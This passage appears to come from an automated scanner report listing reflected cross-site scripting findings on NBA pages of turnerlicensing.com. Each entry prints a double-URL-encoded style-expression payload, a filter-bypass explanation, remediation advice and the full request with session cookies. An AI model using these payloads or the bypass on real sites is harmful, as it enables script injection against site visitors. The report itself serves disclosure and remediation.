GET /NBA/boston_celtics/8120527?9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.17. http://www.turnerlicensing.com/NBA/boston_celtics/8190305 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics/8190305
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 500ef'style='x:expression(alert(1))'130e322f0ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8190305?500ef%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527130e322f0ba=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.18. http://www.turnerlicensing.com/NBA/charlotte_bobcats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/charlotte_bobcats
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f09'style='x:expression(alert(1))'8b7d15cb754 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/charlotte_bobcats?92f09%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b7d15cb754=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.19. http://www.turnerlicensing.com/NBA/chicago_bulls [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/chicago_bulls
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da662'style='x:expression(alert(1))'3336b5f603a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/chicago_bulls?da662%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273336b5f603a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.20. http://www.turnerlicensing.com/NBA/cleveland_cavaliers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/cleveland_cavaliers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4e5e'style='x:expression(alert(1))'5644fd14a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/cleveland_cavaliers?b4e5e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275644fd14a6b=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.21. http://www.turnerlicensing.com/NBA/dallas_mavericks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/dallas_mavericks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c38c9'style='x:expression(alert(1))'c73db034778 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/dallas_mavericks?c38c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c73db034778=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.22. http://www.turnerlicensing.com/NBA/dallas_mavericks/8190309 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/dallas_mavericks/8190309
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41098'style='x:expression(alert(1))'95b3a398db6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/dallas_mavericks/8190309?41098%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795b3a398db6=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.23. http://www.turnerlicensing.com/NBA/denver_nuggets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/denver_nuggets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fecb4'style='x:expression(alert(1))'9aff6941ac8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/denver_nuggets?fecb4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279aff6941ac8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.24. http://www.turnerlicensing.com/NBA/detroit_pistons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/detroit_pistons
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d475'style='x:expression(alert(1))'d6c8dbceaec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/detroit_pistons?4d475%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6c8dbceaec=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.25. http://www.turnerlicensing.com/NBA/detroit_pistons/8170354 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/detroit_pistons/8170354
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9d28'style='x:expression(alert(1))'d60c610a11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/detroit_pistons/8170354?d9d28%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d60c610a11=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.26. http://www.turnerlicensing.com/NBA/golden_state_warriors [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/golden_state_warriors
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da011'style='x:expression(alert(1))'bb8effa7465 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/golden_state_warriors?da011%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb8effa7465=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.27. http://www.turnerlicensing.com/NBA/houston_rockets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/houston_rockets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f230e'style='x:expression(alert(1))'10376efa672 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/houston_rockets?f230e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710376efa672=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.28. http://www.turnerlicensing.com/NBA/indiana_pacers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/indiana_pacers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62eed'style='x:expression(alert(1))'169b01b72cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/indiana_pacers?62eed%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527169b01b72cb=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.29. http://www.turnerlicensing.com/NBA/los_angeles_clippers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/los_angeles_clippers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf1d3'style='x:expression(alert(1))'8bebc190ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_clippers?bf1d3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278bebc190ba=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.30. http://www.turnerlicensing.com/NBA/los_angeles_lakers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/los_angeles_lakers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43257'style='x:expression(alert(1))'7a0d3f891bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_lakers?43257%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277a0d3f891bf=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.31. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8010793 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/los_angeles_lakers/8010793
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66095'style='x:expression(alert(1))'00567ee7d15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
